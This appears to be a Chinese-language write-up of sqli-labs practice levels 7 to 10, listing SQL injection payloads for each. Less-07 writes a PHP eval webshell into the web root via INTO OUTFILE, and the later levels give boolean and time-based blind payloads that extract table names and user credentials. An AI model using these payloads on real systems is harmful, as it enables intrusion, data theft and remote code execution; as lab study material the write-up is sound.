sqli-labs靶场笔记(三)
Less-07【木马上传|’))注入】
下面展示 payload
。
id=1')) order by 3--+ //显示属性为3列
id=-1')) union select 1,2,'<?php @eval($_POST["code"]);?>' into outfile 'C:\\software\\phpstudy_pro\\WWW\\love.php'--+ //将一句话木马写入
用蚁剑连接love.php即可通关
Less-08【Boolean注入|'注入】
下面展示 payload
。
id=1' and 1=1 --+ //确定存在sql注入
id=1' order by 3 --+ //确定属性列为3
id=1' and ascii(substr((select database()),1,1))=115 --+
参考之前的Boolean注入
Less-09【时间盲注|'注入】
下面展示 payload
。
id=1' and sleep(5) --+ //判断存在注入
id=1' and if(ascii(substr((select database()),1,1))=115,sleep(5),1) --+ //猜测数据库名
id=1' and if(exists(select * from information_schema.columns),sleep(5),1) --+ //查看是否存在
id=1' and if(ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) --+ //查看数据库表
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=66,sleep(5),1) --+ //查看属性列
id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=66,sleep(5),1) --+ //查看数据
判断是否存在注入点
时间为5秒多,存在注入
猜测数据库名
确定数据库长度为8
此处使用Burp猜测,可快速猜测
确定数据库名为security
查看表名、属性列
存在information_schema.columns表
查看第一个表为emails
查看第三个表为referers
剩下略
得到第一个属性列为id
得到第二个属性为username
剩下略
查看数据
得到第一个账户名为Dumb
得到第一个账户密码为Dumb
Less-10【时间盲注|"注入】
下面展示 payload
。
id=1" and sleep(5) --+ //判断注入点
id=1" and if(ascii(substr((select database()),1,1))=115,sleep(5),1) --+ //查看数据库名
id=1“ and if(exists(select * from information_schema.columns),sleep(5),1) --+ //查看是否存在
id=1” and if(ascii(substr((select table_name from information_schema.columns where table_schema='security' limit 0,1),1,1))=101,sleep(5),1) --+ //查看数据库表
id=1“ and if(ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))=66,sleep(5),1) --+ //查看属性列
id=1” and if(ascii(substr((select username from security.users limit 0,1),1,1))=66,sleep(5),1) --+ //查看数据
详情参考Less-09